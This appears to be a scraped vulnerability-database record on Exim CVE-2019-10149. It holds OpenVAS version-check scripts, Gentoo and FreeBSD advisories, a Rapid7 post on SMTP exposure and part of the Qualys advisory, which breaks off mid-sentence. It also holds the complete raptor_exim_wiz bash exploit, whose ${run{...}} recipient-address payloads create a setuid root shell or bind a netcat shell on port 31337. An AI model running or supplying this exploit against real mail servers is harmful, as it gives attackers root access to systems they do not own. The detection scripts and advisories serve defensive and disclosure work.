a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The Qualys Research Labs reported a flaw in Exim, a mail transport\nagent. Improper validation of the recipient address in the\ndeliver_message() function may result in the execution of arbitrary\ncommands.\");\n\n script_tag(name:\"affected\", value:\"'exim4' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), this problem has been fixed in\nversion 4.89-2+deb9u4.\n\nWe recommend that you upgrade your exim4 packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"exim4\", ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-07T14:49:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-10149"], "description": "Exim is prone to an unauthenticated remote code execution vulnerability.", "modified": "2019-06-07T00:00:00", "published": "2019-06-07T00:00:00", "id": "OPENVAS:1361412562310140090", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140090", "type": "openvas", "title": "Exim 4.87 - 4.91 RCE Vulnerability", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:exim:exim\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140090\");\n script_version(\"2019-06-07T01:42:55+0000\");\n script_tag(name:\"last_modification\", value:\"2019-06-07 01:42:55 +0000 (Fri, 07 Jun 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-06-07 01:35:15 +0000 (Fri, 07 Jun 2019)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2019-10149\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Exim 4.87 - 4.91 RCE Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_exim_detect.nasl\");\n script_mandatory_keys(\"exim/installed\");\n\n script_tag(name:\"summary\", value:\"Exim is prone to an unauthenticated remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Improper validation of recipient address in deliver_message() function in\n /src/deliver.c may lead to remote command execution.\");\n\n script_tag(name:\"affected\", value:\"Exim version 4.87 to 4.91.\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.92 or later or apply the provided patch.\");\n\n script_xref(name:\"URL\", value:\"https://www.exim.org/static/doc/security/CVE-2019-10149.txt\");\n script_xref(name:\"URL\", value:\"https://www.openwall.com/lists/oss-security/2019/06/05/3\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_in_range(version: version, test_version: \"4.87\", test_version2: \"4.91\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"4.92\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-07T14:49:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-10149"], "description": "The remote host is missing an update for the ", "modified": "2019-06-06T00:00:00", "published": "2019-06-06T00:00:00", "id": "OPENVAS:1361412562310844043", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310844043", "type": "openvas", "title": "Ubuntu Update for exim4 USN-4010-1", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.844043\");\n script_version(\"2019-06-06T13:02:35+0000\");\n script_cve_id(\"CVE-2019-10149\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-06-06 13:02:35 +0000 (Thu, 06 Jun 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-06-06 02:00:49 +0000 (Thu, 06 Jun 2019)\");\n script_name(\"Ubuntu Update for exim4 USN-4010-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=(UBUNTU18\\.04 LTS|UBUNTU18\\.10)\");\n\n script_xref(name:\"USN\", value:\"4010-1\");\n script_xref(name:\"URL\", value:\"https://lists.ubuntu.com/archives/ubuntu-security-announce/2019-June/004942.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'exim4'\n package(s) announced via the USN-4010-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that Exim incorrectly handled certain decoding\noperations. A remote attacker could possibly use this issue to execute\narbitrary commands.\");\n\n script_tag(name:\"affected\", value:\"'exim4' package(s) on Ubuntu 18.10, Ubuntu 18.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"UBUNTU18.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.90.1-1ubuntu1.2\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.90.1-1ubuntu1.2\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU18.10\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.91-6ubuntu1.1\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.91-6ubuntu1.1\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2019-06-06T21:21:43", "bulletinFamily": "unix", "cvelist": ["CVE-2019-10149"], "description": "### Background\n\nExim is a message transfer agent (MTA) designed to be a a highly configurable, drop-in replacement for sendmail. \n\n### Description\n\nA vulnerability was discovered in how Exim validates recipient addresses in the deliver_message() function. \n\n### Impact\n\nA remote attacker could execute arbitrary commands by sending an email with a specially crafted recipient address to the affected system. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Exim users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=mail-mta/exim-4.92\"", "edition": 1, "modified": "2019-06-06T00:00:00", "published": "2019-06-06T00:00:00", "id": "GLSA-201906-01", "href": "https://security.gentoo.org/glsa/201906-01", "title": "Exim: Remote command execution", "type": "gentoo", "cvss": {"score": 0.0, "vector": "NONE"}}], "freebsd": [{"lastseen": "2019-06-07T14:41:41", "bulletinFamily": "unix", "cvelist": ["CVE-2019-10149"], "description": "\nExim team and Qualys report:\n\n\n\t We received a report of a possible remote exploit. Currently there is no evidence of an active use of this exploit.\n\t \n\n\t A patch exists already, is being tested, and backported to all\n\t versions we released since (and including) 4.87.\n\t \n\n\t The severity depends on your configuration. It depends on how close to\n\t the standard configuration your Exim runtime configuration is. The\n\t closer the better.\n\t \n\n\t Exim 4.92 is not vulnerable.\n\t \n\n", "edition": 2, "modified": "2019-05-27T00:00:00", "published": "2019-05-27T00:00:00", "id": "45BEA6B5-8855-11E9-8D41-97657151F8C2", "href": "https://vuxml.freebsd.org/freebsd/45bea6b5-8855-11e9-8d41-97657151f8c2.html", "title": "Exim -- RCE in deliver_message() function", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2020-10-02T14:39:33", "bulletinFamily": "info", "cvelist": ["CVE-2019-10149"], "description": "\n\nWelcome to the NICER Protocol Deep Dive blog series! When we started researching what all was out on the internet way back in January, we had no idea we'd end up with a hefty, 137-page tome of a research report. The sheer length of such a thing might put off folks who might otherwise learn a thing or two about the nature of internet exposure, so we figured, why not break up all the protocol studies into their own reports?\n\nSo, here we are! What follows is taken directly from our National / Industry / Cloud Exposure Report (NICER), so if you don't want to wait around for the next installment, you can cheat and read ahead!\n\n#### [Research] Read the full NICER report today\n\n[Get Started](<https://www.rapid7.com/info/nicer-2020/>)\n\n \n\n\n## SMTP (25/465/587)\n\n_The \u201cSimple\u201d in SMTP is intended to be ironic._\n\n#### TLDR\n\n * **WHAT IT IS:** A usually cleartext, text-based standard for delivering email between networks.\n * **HOW MANY**: 5,805,012 discovered nodes on port 25 and 4,007,931 on port 587. SMTPS on port 465 comes in with 3,494,067. All together, that's 13,307,010 distinct service nodes. 3,023,486 (52%) have Recog fingerprints (43 total service families)\n * **VULNERABILITIES: **The natively cleartext nature of email is the primary concern around the security of this protocol. Email is also the most popular method for phishing users into revealing passwords and running malware. Finally, there are at least two serious vulnerabilities in popular mail servers Exim and Microsoft Exchange deployed today.\n * **ADVICE: **Mail administrators need to be fanatical about applying security patches as they become available, and should implement DMARC anti-spoofing controls yesterday.\n * **ALTERNATIVES: **Outsourcing email to a cloud provider, such as Google or Microsoft, is often the right choice when comparing the costs of effectively maintaining this critical internet infrastructure.\n * **GETTING: **Better (25/587)! Fewer crazy people are hosting their own mail.\n\n### SMTP discovery details\n\nWhile SMTP is traditionally cleartext with an optional secure protocol negotiation called STARTTLS, we're seeing more SSL-wrapped SMTP, also known as SMTPS, in the world today. The following charts and tables illustrate the distribution of SMTP over port 25, SMTP on port 587 (which is intended for SMTP-to-SMTP relaying of messages), and SMTPS on port 465.\n\n Country | SMTP (25) | SMTP (587) | SMTPS (465) \n---|---|---|--- \nUnited States | 1,467,077 | 1,456,598 | 1,253,805 \nGermany | 637,569 | 373,266 | 375,526 \nJapan | 589,222 | 382,133 | 222,633 \nFrance | 398,390 | 212,937 | 196,177 \nPoland | 306,368 | 289,522 | 284,297 \nSpain | 291,844 | 44,435 | 48,694 \nRussia | 245,814 | 104,709 | 95,972 \nUnited Kingdom | 193,073 | 121,902 | 122,069 \nNetherlands | 189,456 | 129,690 | 115,211 \nCanada | 137,342 | 146,323 | 132,133 \n Provider | SMTP (25) | SMTP (587) | SMTPS (465) \n---|---|---|--- \nOVHcloud | 317,584 | 248,695 | 236,772 \nAmazon | 95,175 | 32,579 | 31,438 \nDigitalOcean | 74,097 | 46,521 | 41,234 \nScaleway | 30,876 | 15,332 | 12,594 \nQuadraNet | 29,282 | 18,200 | 8,667 \nGoogle | 29,030 | 50,422 | 50,561 \nMicrosoft | 14,945 | 5,576 | 2,790 \nRackspace | 8,459 | 2,511 | 1,841 \nAlibaba | 5,729 | 3,863 | 3,826 \nOracle | 1,274 | 509 | 345 \n \nAs far as top-level domains are concerned, we see that the vast majority of SMTP lives in dot-com land\u2014we counted over 100 million MX records in dot-com registrations, with a sharp drop-off in dot-de, dot-net, and dot-org, with about 10 million MX records in each.\n\n### SMTP exposure information\n\nThere are dozens of SMTP servers to choose from, each with their own idiosyncratic methods of configuration, spam filtering, and security. The top SMTP server we're able to fingerprint is Postfix, with over a million and a half installs, followed by Exim, Exchange, and trusty Sendmail. The table below is the complete list of every SMTP server we positively identified\u2014mail administrators will recognize the vestiges of old, little-used mail servers, such as the venerable Lotus Domino and ZMailer. If these are your mail servers, think long and hard about why you\u2019re still running these as opposed to simply farming this thankless chore out to a dedicated mail service provider.\n\nSMTP Family | Count \n---|--- \nPostfix | 1,679,222 \nexim | 759,799 \nExchange Server | 182,263 \nSendmail | 180,812 \nMail Server | 84,262 \nIIS | 58,720 \nEcelerity Mail Server | 25,206 \nMDaemon | 14,404 \nConnect | 10,447 \nIMail Server | 5,354 \nPro | 3,462 \nIBM Domino | 3,445 \nTwisted | 1,999 \nUTM | 1,926 \nWinWebMail | 1,879 \nEmail Security | 1,867 \nListManager | 1,785 \nLotus Domino | 1,734 \nDavid | 1,490 \nPowerMTA | 1,239 \nCCProxy | 675 \nMailSite | 305 \nPost.Office | 275 \nVPOP3 | 245 \nZMailer | 205 \nGroupWise | 176 \nCheck Point | 78 \nWinRoute | 43 \nMessaging Server | 40 \nVOPMail | 24 \nIntraStore | 22 \nInternet Mail Server | 18 \nNTMail | 17 \nMercury Mail Transport System | 15 \nFWTK | 9 \nSLMail | 8 \nFTGate | 4 \nInternet Mail Services | 4 \nVM | 3 \nMail-Max | 2 \nAppleShare IP Mail Server | 1 \nMERCUR | 1 \nWebShield | 1 \n \nFinally, let's take a quick look at the Exim mail server. Like most other popular software on the internet, we can find all sorts of versions. Unlike other popular software, Exim versioning moves pretty quickly\u2014the current version of Exim at the time of scanning was v 4.93, and has already incremented to 4.94 by the time of publication. However, the popularity of the latest version (4.93) versus next-to-latest (4.92.x) is in the 100,000 range, and given the intense scrutiny afforded to Exim by national intelligence agencies, this delta can be pretty troubling. It\u2019s so troubling that the [American National Security Agency issued an advisory](<https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf>) urging Exim administrators to patch and upgrade as soon as possible to avoid exploitation by the \u201cSandworm team.\u201d Specifically, the vulnerability exploited was CVE-2019-10149, and affects versions 4.87 through 4.91\u2014as of the time of our scans, we found approximately 87,500 such servers exposed to the internet. While this is about a fifth of all Exim servers out there, exposed vulnerabilities in mail servers tend to shoot to the top of any list of \u201cmust patch now\u201d vulns.\n\n### Attacker\u2019s view\n\nGiven the high value attackers tend to assign to SMTP vulnerabilities, it\u2019s no surprise that we see fairly consistent scanning action among threat actors in our SMTP honeypots.\n\n Date | SMTP Port | Count | Percentage | Provider \n---|---|---|---|--- \n2020-02-15 | 25 | 518 | 12.92% | Sprint (Poland) \n2020-02-15 | 25 | 514 | 12.82% | China Telecom \n2020-02-15 | 25 | 409 | 10.20% | Tele Asia Hosting \n2020-02-15 | 465 | 4,337 | 99.18% | DigitalOcean \n2020-02-15 | 587 | 4,568 | 99.65% | DigitalOcean \n2020-02-26 | 25 | 32,495 | 73.97% | Hostwinds \n2020-02-26 | 25 | 6,504 | 14.81% | Sprint (Poland) \n2020-02-26 | 25 | 2,730 | 6.21% | Tamatiya Eood Hosting \n2020-02-26 | 465 | 851 | 69.36% | DigitalOcean \n2020-02-26 | 465 | 344 | 28.04% | Web Hosted Group \n2020-02-26 | 587 | 948 | 94.33% | DigitalOcean \n2020-03-25 | 25 | 4,930 | 41.55% | Microsoft 365 \n2020-03-25 | 25 | 1,481 | 12.48% | Locaweb Hosting \n2020-03-25 | 25 | 509 | 4.29% | Hurricane Electric \n2020-03-25 | 465 | 415 | 95.62% | DigitalOcean \n2020-03-25 | 587 | 408 | 97.14% | DigitalOcean \n2020-05-09 | 25 | 1,180 | 58.13% | Vietnam Telecom \n2020-05-09 | 25 | 195 | 9.61% | Zumy Communications \n2020-05-09 | 25 | 159 | 7.83% | China Telecom \n2020-05-09 | 465 | 6,641 | 94.91% | Microsoft 365 \n2020-05-09 | 465 | 326 | 4.66% | DigitalOcean \n2020-05-09 | 587 | 316 | 95.18% | DigitalOcean \n \n### Our advice around SMTP\n\n**IT and IT security teams **should seriously consider converting over to an established email provider such as Microsoft's Office 365 or Google's G Suite. Running your own email remains one of the more truly painful network administration tasks, since outages, patch management, and redundant backups can be tricky even in the best of times, to say nothing of the constant drain of resources in the fight against spam and phishing. Established providers in this space have a proven track record of handling both spam and phishing, as well as achieving remarkable uptimes.\n\n**Cloud providers** should provide rock-solid documentation on how to set up SMTP services for their customers, starting with SSL-wrapped SMTP as a default configuration. This is one case where we wouldn't be opposed to providers such as Microsoft and Google inserting a little adver-docu-tizing pushing customers over to their hosted mail solutions.\n\n**Government cybersecurity agencies **should recognize that everyone is challenged by running merely serviceable email infrastructure, and very few organizations are truly excellent at it at any reasonable scale. As far as content-based attacks are concerned, these experts should continue pressing for minimum technical defenses, such as DMARC, and user education in recognizing and avoiding phishing scams.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "modified": "2020-10-02T13:58:23", "published": "2020-10-02T13:58:23", "id": "RAPID7BLOG:F3A304F4033DF3E6F81CCD52475053BD", "href": "https://blog.rapid7.com/2020/10/02/nicer-protocol-deep-dive-internet-exposure-of-smtp/", "type": "rapid7blog", "title": "NICER Protocol Deep Dive: Internet Exposure of SMTP", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:14", "description": "\nExim 4.87 - 4.91 - Local Privilege Escalation", "edition": 1, "published": "2019-06-17T00:00:00", "title": "Exim 4.87 - 4.91 - Local Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-10149"], "modified": "2019-06-17T00:00:00", "id": "EXPLOITPACK:5F07E65256D3B05FE6074E80F7346498", "href": "", "sourceData": "#!/bin/bash\n\n#\n# raptor_exim_wiz - \"The Return of the WIZard\" LPE exploit\n# Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>\n#\n# A flaw was found in Exim versions 4.87 to 4.91 (inclusive). \n# Improper validation of recipient address in deliver_message() \n# function in /src/deliver.c may lead to remote command execution.\n# (CVE-2019-10149)\n#\n# This is a local privilege escalation exploit for \"The Return \n# of the WIZard\" vulnerability reported by the Qualys Security \n# Advisory team.\n#\n# Credits:\n# Qualys Security Advisory team (kudos for your amazing research!)\n# Dennis 'dhn' Herrmann (/dev/tcp technique)\n#\n# Usage (setuid method):\n# $ id\n# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]\n# $ ./raptor_exim_wiz -m setuid\n# Preparing setuid shell helper...\n# Delivering setuid payload...\n# [...]\n# Waiting 5 seconds...\n# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned\n# # id\n# uid=0(root) gid=0(root) groups=0(root)\n#\n# Usage (netcat method):\n# $ id\n# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]\n# $ ./raptor_exim_wiz -m netcat\n# Delivering netcat payload...\n# Waiting 5 seconds...\n# localhost [127.0.0.1] 31337 (?) open\n# id\n# uid=0(root) gid=0(root) groups=0(root)\n#\n# Vulnerable platforms:\n# Exim 4.87 - 4.91\n#\n# Tested against:\n# Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz]\n#\n\nMETHOD=\"setuid\" # default method\nPAYLOAD_SETUID='${run{\\x2fbin\\x2fsh\\t-c\\t\\x22chown\\troot\\t\\x2ftmp\\x2fpwned\\x3bchmod\\t4755\\t\\x2ftmp\\x2fpwned\\x22}}@localhost'\nPAYLOAD_NETCAT='${run{\\x2fbin\\x2fsh\\t-c\\t\\x22nc\\t-lp\\t31337\\t-e\\t\\x2fbin\\x2fsh\\x22}}@localhost'\n\n# usage instructions\nfunction usage()\n{\n\techo \"$0 [-m METHOD]\"\n\techo\n\techo \"-m setuid : use the setuid payload (default)\"\n\techo \"-m netcat : use the netcat payload\"\n\techo\n\texit 1\n}\n\n# payload delivery\nfunction exploit()\n{\n\t# connect to localhost:25\n\texec 3<>/dev/tcp/localhost/25\n\n\t# deliver the payload\n\tread -u 3 && echo $REPLY\n\techo \"helo localhost\" >&3\n\tread -u 3 && echo $REPLY\n\techo \"mail from:<>\" >&3\n\tread -u 3 && echo $REPLY\n\techo \"rcpt to:<$PAYLOAD>\" >&3\n\tread -u 3 && echo $REPLY\n\techo \"data\" >&3\n\tread -u 3 && echo $REPLY\n\tfor i in {1..31}\n\tdo\n\t\techo \"Received: $i\" >&3\n\tdone\n\techo \".\" >&3\n\tread -u 3 && echo $REPLY\n\techo \"quit\" >&3\n\tread -u 3 && echo $REPLY\n}\n\n# print banner\necho\necho 'raptor_exim_wiz - \"The Return of the WIZard\" LPE exploit'\necho 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>'\necho\n\n# parse command line\nwhile [ ! -z \"$1\" ]; do\n\tcase $1 in\n\t\t-m) shift; METHOD=\"$1\"; shift;;\n\t\t* ) usage\n\t\t;;\n\tesac\ndone\nif [ -z $METHOD ]; then\n\tusage\nfi\n\n# setuid method\nif [ $METHOD = \"setuid\" ]; then\n\n\t# prepare a setuid shell helper to circumvent bash checks\n\techo \"Preparing setuid shell helper...\"\n\techo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" >/tmp/pwned.c\n\tgcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null\n\tif [ $? -ne 0 ]; then\n\t\techo \"Problems compiling setuid shell helper, check your gcc.\"\n\t\techo \"Falling back to the /bin/sh method.\"\n\t\tcp /bin/sh /tmp/pwned\n\tfi\n\techo\n\n\t# select and deliver the payload\n\techo \"Delivering $METHOD payload...\"\n\tPAYLOAD=$PAYLOAD_SETUID\n\texploit\n\techo\n\n\t# wait for the magic to happen and spawn our shell\n\techo \"Waiting 5 seconds...\"\n\tsleep 5\n\tls -l /tmp/pwned\n\t/tmp/pwned\n\n# netcat method\nelif [ $METHOD = \"netcat\" ]; then\n\n\t# select and deliver the payload\n\techo \"Delivering $METHOD payload...\"\n\tPAYLOAD=$PAYLOAD_NETCAT\n\texploit\n\techo\n\n\t# wait for the magic to happen and spawn our shell\n\techo \"Waiting 5 seconds...\"\n\tsleep 5\n\tnc -v 127.0.0.1 31337\n\n# print help\nelse\n\tusage\nfi", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:14", "description": "\nExim 4.87 4.91 - (Local Remote) Command Execution", "edition": 1, "published": "2019-06-05T00:00:00", "title": "Exim 4.87 4.91 - (Local Remote) Command Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-10149", "CVE-1999-0095", "CVE-1999-0145"], "modified": "2019-06-05T00:00:00", "id": "EXPLOITPACK:4FFD4258EB9240F56C83A57C965E0913", "href": "", "sourceData": "Qualys Security Advisory\n\nThe Return of the WIZard: RCE in Exim (CVE-2019-10149)\n\n\n========================================================================\nContents\n========================================================================\n\nSummary\nLocal exploitation\nRemote exploitation\n- Non-default configurations\n- Default configuration\nAcknowledgments\nTimeline\n\n Boromir: \"What is this new devilry?\"\n Gandalf: \"A Balrog. A demon of the Ancient World.\"\n -- The Lord of the Rings: The Fellowship of the Ring\n\n\n========================================================================\nSummary\n========================================================================\n\nDuring a code review of the latest changes in the Exim mail server\n(https://en.wikipedia.org/wiki/Exim), we discovered an RCE vulnerability\nin versions 4.87 to 4.91 (inclusive). In this particular case, RCE means\nRemote *Command* Execution, not Remote Code Execution: an attacker can\nexecute arbitrary commands with execv(), as root; no memory corruption\nor ROP (Return-Oriented Programming) is involved.\n\nThis vulnerability is exploitable instantly by a local attacker (and by\na remote attacker in certain non-default configurations). To remotely\nexploit this vulnerability in the default configuration, an attacker\nmust keep a connection to the vulnerable server open for 7 days (by\ntransmitting one byte every few minutes). However, because of the\nextreme complexity of Exim's code, we cannot guarantee that this\nexploitation method is unique; faster methods may exist.\n\nExim is vulnerable by default since version 4.87 (released on April 6,\n2016), when #ifdef EXPERIMENTAL_EVENT became #ifndef DISABLE_EVENT; and\nolder versions may also be vulnerable if EXPERIMENTAL_EVENT was enabled\nmanually. Surprisingly, this vulnerability was fixed in version 4.92\n(released on February 10, 2019):\n\nhttps://github.com/Exim/exim/commit/7ea1237c783e380d7bdb8...\nhttps://bugs.exim.org/show_bug.cgi?id=2310\n\nbut was not identified as a security vulnerability, and most operating\nsystems are therefore affected. For example, we exploit an up-to-date\nDebian distribution (9.9) in this advisory.\n\n\n========================================================================\nLocal exploitation\n========================================================================\n\nThe vulnerable code is located in deliver_message():\n\n6122 #ifndef DISABLE_EVENT\n6123 if (process_recipients != RECIP_ACCEPT)\n6124 {\n6125 uschar * save_local = deliver_localpart;\n6126 const uschar * save_domain = deliver_domain;\n6127\n6128 deliver_localpart = expand_string(\n6129 string_sprintf(\"${local_part:%s}\", new->address));\n6130 deliver_domain = expand_string(\n6131 string_sprintf(\"${domain:%s}\", new->address));\n6132\n6133 (void) event_raise(event_action,\n6134 US\"msg:fail:internal\", new->message);\n6135\n6136 deliver_localpart = save_local;\n6137 deliver_domain = save_domain;\n6138 }\n6139 #endif\n\nBecause expand_string() recognizes the \"${run{<command> <args>}}\"\nexpansion item, and because new->address is the recipient of the mail\nthat is being delivered, a local attacker can simply send a mail to\n\"${run{...}}@localhost\" (where \"localhost\" is one of Exim's\nlocal_domains) and execute arbitrary commands, as root\n(deliver_drop_privilege is false, by default):\n\n[...]\n\n\n========================================================================\nRemote exploitation\n========================================================================\n\nOur local-exploitation method does not work remotely, because the\n\"verify = recipient\" ACL (Access-Control List) in Exim's default\nconfiguration requires the local part of the recipient's address (the\npart that precedes the @ sign) to be the name of a local user:\n\n[...]\n\n------------------------------------------------------------------------\nNon-default configurations\n------------------------------------------------------------------------\n\nWe eventually devised an elaborate method for exploiting Exim remotely\nin its default configuration, but we first identified various\nnon-default configurations that are easy to exploit remotely:\n\n- If the \"verify = recipient\" ACL was removed manually by an\n administrator (maybe to prevent username enumeration via RCPT TO),\n then our local-exploitation method also works remotely.\n\n- If Exim was configured to recognize tags in the local part of the\n recipient's address (via \"local_part_suffix = +* : -*\" for example),\n then a remote attacker can simply reuse our local-exploitation method\n with an RCPT TO \"balrog+${run{...}}@localhost\" (where \"balrog\" is the\n name of a local user).\n\n- If Exim was configured to relay mail to a remote domain, as a\n secondary MX (Mail eXchange), then a remote attacker can simply 